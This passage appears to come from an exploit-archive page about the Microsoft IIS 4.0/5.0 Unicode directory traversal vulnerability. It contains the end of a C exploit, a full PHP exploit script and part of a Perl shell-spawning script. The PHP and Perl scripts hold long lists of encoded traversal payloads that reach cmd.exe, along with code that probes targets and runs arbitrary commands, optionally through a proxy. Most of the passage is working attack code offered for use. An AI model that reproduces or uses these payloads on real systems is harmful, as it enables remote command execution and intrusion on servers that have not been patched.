	 /* close the socket ... not needed any more */
	 close (sck);
	 /* put zero's in the buffers */
	 bzero (buffer, sizeof(buffer));
	 bzero (recbuffer, sizeof(recbuffer));
      } else {
	 /* you type "exit" cya :) */
	 exit(0);
      }
   }
}
/* you miss a parameter :'-( */
int bad_params (char *prog_name) {
   fprintf (stdout, "usage:\n\t%s <hostname> <number>\n", prog_name);
   fprintf (stdout,
"-------------------------------------------------------\n");
   fprintf (stdout, "<1> msadc\t");
   fprintf (stdout, "<2> scripts\t");
   fprintf (stdout, "<3> iisadmpwd\t");
   fprintf (stdout, "<4> /\n");
   fprintf (stdout,
"-------------------------------------------------------\n");
   exit (1);
}
/* EOF */		

- 漏洞信息 (20301)

MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (4) (EDBID:20301)
windows remote
2000-10-17 Verified
0 BoloTron
N/A [点击下载]
source: http://www.securityfocus.com/bid/1806/info
 
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\".
 
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
 
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
 
This is the vulnerability exploited by the Code Blue Worm.
 
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.

#!php -q
<?

$vector_ataque[0]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";

$vector_ataque[1]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[2]="/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[3]="/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[4]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[5]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";

$vector_ataque[6]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[7]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";

$vector_ataque[8]="/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";

$vector_ataque[9]="/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[10]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[11]="/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[12]="/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";

$vector_ataque[13]="/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[14]="/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[15]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";

$vector_ataque[16]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";

$vector_ataque[17]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[18]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[19]="/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[20]="/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";

$vector_ataque[21]="/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[22]="/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[23]="/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[24]="/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";

$vector_ataque[25]="/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[26]="/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";

$vector_ataque[27]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";

$vector_ataque[28]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";

$vector_ataque[29]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[30]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";

$vector_ataque[31]="/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[32]="/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[33]="/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";

$vector_ataque[34]="/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[35]="/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[36]="/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";

$vector_ataque[37]="/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";

$vector_ataque[38]="/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";

$vector_ataque[39]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";

$vector_ataque[40]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";

$vector_ataque[41]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";

$vector_ataque[42]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";

$vector_ataque[43]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[44]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";

$vector_ataque[45]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";

$vector_ataque[46]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";

$vector_ataque[47]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";

$vector_ataque[48]="/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[49]="/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[50]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[51]="/scripts..%c1%9c../winnt/system32/cmd.exe?/c+";

$vector_ataque[52]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";

$vector_ataque[53]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";

$vector_ataque[54]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";

$vector_ataque[55]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";

$vector_ataque[56]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";

$vector_ataque[57]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";

$vector_ataque[58]="/scripts/..%c1%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[59]="/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[60]="/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[61]="/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[62]="/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[63]="/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c+";

$vector_ataque[64]="/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[65]="/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[66]="/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[67]="/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[68]="/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

$vector_ataque[69]="/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
        if(!isset($argv[1]))
        {
                echo

"\n\n--------------------------------------------------------------------\n";
                echo "------------- (c) UNICODE exploit for IIS 5.0/4.0 by BoloTron
------\n";
                echo
"--------------------------------------------------------------------\n\n";
                echo "Usage of the wicked device:\n";
                echo $argv[0]." -t www.victim.vic\n";
                echo $argv[0]." -t www.victim.vic -p proxy:port\n";
                echo $argv[0]."  www.victim.vic comand variant_number\n";
                echo $argv[0]." -p proxy:port www.victim.vic comand variant_number\n";
                echo "Options:\n";
                echo "-t --> Test the vulnerability (Try known variants till find the good
one)\n";
                echo "-p --> Attack through proxy\n";
                echo "\nUse Mode:\n1) Test the host and get the variants number in case
vulnerability exists\n";
                echo "2) Attack with command and variants number (optionaly you can use
proxy)\n";
                echo "Note : When you specify a command with spaces, replace spaces
with low script  \"_\" \n";
                echo "and you must double the backslash \"\\\". \n
Example".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\\\inetpub 49\n";
                echo "Thanks to An-tonio for the proxy support.\n";
                echo "Bug discover by Anonymous Post.\n";
                echo "TYPE ".$argv[0]." spanish, for Spanish help.\n";
        }
        else
        {
                if($argv[1]=="spanish")
                {
                echo
"\n\n--------------------------------------------------------------------\n";
                echo "------------- (c) Exploit UNICODE para IIS 5.0/4.0 por
BoloTron ----\n";
                echo
"--------------------------------------------------------------------\n\n";
                echo "Uso del artefacto maligno :\n";

                echo $argv[0]." -t www.victima.vic\n";
                echo $argv[0]." -t www.victima.vic -p proxy:puerto\n";
                echo $argv[0]."  www.victima.vic comando n�_de_variante\n";
                echo $argv[0]." -p proxy:port www.victima.vic comand
n�_de_variante\n";
                echo "Opciones:\n";
                echo "-t --> Testea la vulnerabilidad, prueba todas las
variantes hasta encontrar una buena.\n";
                echo "-p --> Ataque a traves de proxy\n";
                echo "\nModo de Empleo:\n1) Testear el host y anotar el
numero de variante en caso de ser vulnerable\n";
                echo "2) Atacar especificando comando y n� de variante
(opcionalmente puedes especificar un proxy)\n";
                echo "Nota : Cuando se especifica un comando en el que hay
espacios hay que sustituirlos por un guion bajo _ \n";
                echo "y las contrabarras hay que ponerlas dobles. \nEjemplo :
".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\\\inetpub 49\n";
                echo "Gracias a An-tonio por sus indicaciones en el soporte proxy.\n";
                echo "Bug descubierto por aviso anonimo.\n";
                exit;
                }
                if($argv[1]=="-t")
                {
                        if ($argv[3]=="-p")
                        {
                        for($i=0;$i<70;$i++)
                        {
                                $prox=explode(":",$argv[4]);
                                $comando="dir+c:\\";
                                $fp = fsockopen($prox[0], $prox[1]);
                                if(!$fp)
                                {
                                        echo "Conection failed...\n";
                                }
                                else
                                {
                                        fputs($fp,"GET
http://".$argv[2]."".$vector_ataque[$i]."".$comando." HTTP/1.0\n\n");
                                        echo "Trying variant number ".$i." ";
                                        while(!feof($fp))
                                        {
                                                $resul=$resul.fgets($fp,128);
                                        }
                                        if (ereg("<DIR>", $resul))
                                        {
                                                echo "-----> Vulnerable!!\n";
                                                exit;
                                        }
                                        else
                                        {
                                                echo "-----> NoT Vulnerable
:(\n";
                                        }

                                }
                                fclose($fp);
                        }
                        }
                        else
                        {
                        for($i=0;$i<70;$i++)
                        {
                                $port=80;
                                $comando="dir+c:\\";
                                $fp = fsockopen($argv[2], $port);
                                if(!$fp)
                                {
                                        echo "Conection failed...\n";
                                }
                                else
                                {
                                        fputs($fp,"GET
".$vector_ataque[$i]."".$comando." HTTP/1.0\n\n");
                                        echo "Trying variant number ".$i." ";
                                        while(!feof($fp))
                                        {
                                                $resul=$resul.fgets($fp,128);
                                        }
                                        if (ereg("<DIR>", $resul))
                                        {
                                                echo "-----> vulnerable!!\n";
                                                exit;
                                        }
                                        else
                                        {
                                                echo "-----> No Vulnerable :(\n";
                                        }

                                }
                                fclose($fp);
                        }
                        }
                }
                else
                {
                        if($argv[1]=="-p")
                        {
                                $prox=explode(":",$argv[2]);
                                $port=$prox[1];
                                $comando=ereg_replace("_","+",$argv[4]);
                                $fp = fsockopen($prox[0], $port);

                                if(!$fp)
                                {
                                        echo "Conection failed.\n";
                                }
                                else
                                {
                                        fputs($fp,"GET
http://".$argv[3]."".$vector_ataque[$argv[5]]."".$comando." HTTP/1.0\n\n");
                                        while(!feof($fp))
                                        {
                                                echo fgets($fp,128);
                                        }
                                }
                                fclose($fp);

                        }
                        else
                        {
                                $port=80;
                                $comando=ereg_replace("_","+",$argv[2]);
                                $fp = fsockopen($argv[1], $port);
                                if(!$fp)
                                {
                                        echo "Conection failed.\n";
                                }
                                else
                                {
                                        fputs($fp,"GET ".$vector_ataque[$argv[3]]."".$comando." HTTP/1.0\n\n");
                                        while(!feof($fp))
                                        {
                                                echo fgets($fp,128);
                                        }
                                }
                                fclose($fp);
                        }
                }




        }
?>		

- 漏洞信息 (20302)

MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (5) (EDBID:20302)
windows remote
2000-10-17 Verified
0 Andrea Spabam
N/A [点击下载]
source: http://www.securityfocus.com/bid/1806/info
  
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\".
  
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
  
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
  
This is the vulnerability exploited by the Code Blue Worm.
  
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.

##########################################################
# Spawn Ms-Doz-like Shell on MicrosoZ IIS
# on IIS vulnerable servers using 450 ways
# (like Unicode, Codered, corrupt string and Backdoor)
#     NOW SUPPORT ALL UNIX SYSTEM !
# Use port number with SSLproxy for testing SSL sites
# Andrea Spabam 2001 GPL2 or highter
# spabam@go.to
# This Script is currently under development
# link to http://spabam.da.ru to get latest version
##########################################################
use strict;
use IO::Socket;
my $host;
my $port;
my $command;
my $url;
my @results;
my $probe;
my @U;
$U[1] = "/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[2] = "/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[3] = "/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[4] = "/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[5] = "..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[6] = "/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[7] = "/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[8] = "/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[9] = "/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[10] = "/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[11] = "/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[12] = "/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[13] = "/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[14] = "/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+";
$U[15] = "/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+";
$U[16] = "/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+";
$U[17] = "/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[18] = "/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[19] = "/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[20] = "/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[21] = "/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[22] = "/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[23] = "/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[24] = "/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[25] = "/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[26] = "/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[27] = "/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[28] = "/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[29] = "/root.exe?/c+";
$U[30] = "/cmd.exe?/c+";
$U[31] = "/sensepost.exe?/c+";
$U[32] = "/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[33] = "/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[34] = "/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[35] = "/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[36] = "/MSADC/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[37] = "/MSADC/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[38] = "/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[39] = "/MSADC/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[40] = "/MSADC..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[41] = "/MSADC/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[42] = "/MSADC/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[43] = "/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[44] = "/MSADC/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[45] = "/MSADC/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[46] = "/MSADC/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[47] = "/MSADC/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[48] = "/MSADC/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[49] = "/MSADC/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+";
$U[50] = "/MSADC/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+";
$U[51] = "/MSADC/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+";
$U[52] = "/MSADC/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[53] = "/MSADC/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[54] = "/MSADC/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[55] = "/MSADC/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[56] = "/MSADC/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[57] = "/MSADC/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[58] = "/MSADC/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[59] = "/MSADC/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[60] = "/MSADC/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[61] = "/MSADC/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[62] = "/MSADC/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[63] = "/MSADC/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[64] = "/MSADC/root.exe?/c+";
$U[65] = "/MSADC/cmd.exe?/c+";
$U[66] = "/MSADC/sensepost.exe?/c+";
$U[67] = "/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[68] = "/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[69] = "/MSADC/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[70] = "/MSADC/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[71] = "/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[72] = "/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[73] = "/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[74] = "/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[75] = "/msadc..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[76] = "/msadc/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[77] = "/msadc/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[78] = "/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[79] = "/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[80] = "/msadc/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[81] = "/msadc/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[82] = "/msadc/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[83] = "/msadc/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[84] = "/msadc/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+";
$U[85] = "/msadc/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+";
$U[86] = "/msadc/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+";
$U[87] = "/msadc/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[88] = "/msadc/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[89] = "/msadc/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[90] = "/msadc/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[91] = "/msadc/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[92] = "/msadc/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[93] = "/msadc/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[94] = "/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[95] = "/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[96] = "/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[97] = "/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[98] = "/msadc/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[99] = "/msadc/root.exe?/c+";
$U[100] = "/msadc/cmd.exe?/c+";
$U[101] = "/msadc/sensepost.exe?/c+";
$U[102] = "/msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[103] = "/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[104] = "/msadc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[105] = "/msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[106] = "/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[107] = "/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[108] = "/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[109] = "/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[110] = "/scripts..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[111] = "/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[112] = "/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[113] = "/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[114] = "/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[115] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[116] = "/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[117] = "/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[118] = "/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[119] = "/scripts/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+";
$U[120] = "/scripts/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+";
$U[121] = "/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+";
$U[122] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[123] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[124] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[125] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[126] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[127] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[128] = "/scripts/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[129] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[130] = "/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[131] = "/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[132] = "/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[133] = "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[134] = "/scripts/root.exe?/c+";
$U[135] = "/scripts/cmd.exe?/c+";
$U[136] = "/scripts/sensepost.exe?/c+";
$U[137] = "/scripts/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$U[138] = "/scripts/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$U[139] = "/scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[140] = "/scripts/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[141] = "/PBServer/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$U[142] = "/PBServer/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$U[143] = "/PBServer/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$U[144] = "/PBServer/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[145] = "/PBServer..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[146] = "/PBServer/.%252e/.%252e/winnt/system32/cmd.exe?/c+";
$U[147] = "/PBServer/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$U[148] = "/PBServer/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[149] = "/PBServer/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$U[150] = "/PBServer/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$U[151] = "/PBServer/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$U[152] = "/PBServer/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$U[153] = "/PBServer/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$U[154] = "/PBServer/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+";
$U[155] = "/PBServer/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+";
$U[156] = "/PBServer/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+";
$U[157] = "/PBServer/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[158] = "/PBServer/..%c0%af../winnt/system32/cmd.exe?/c+";
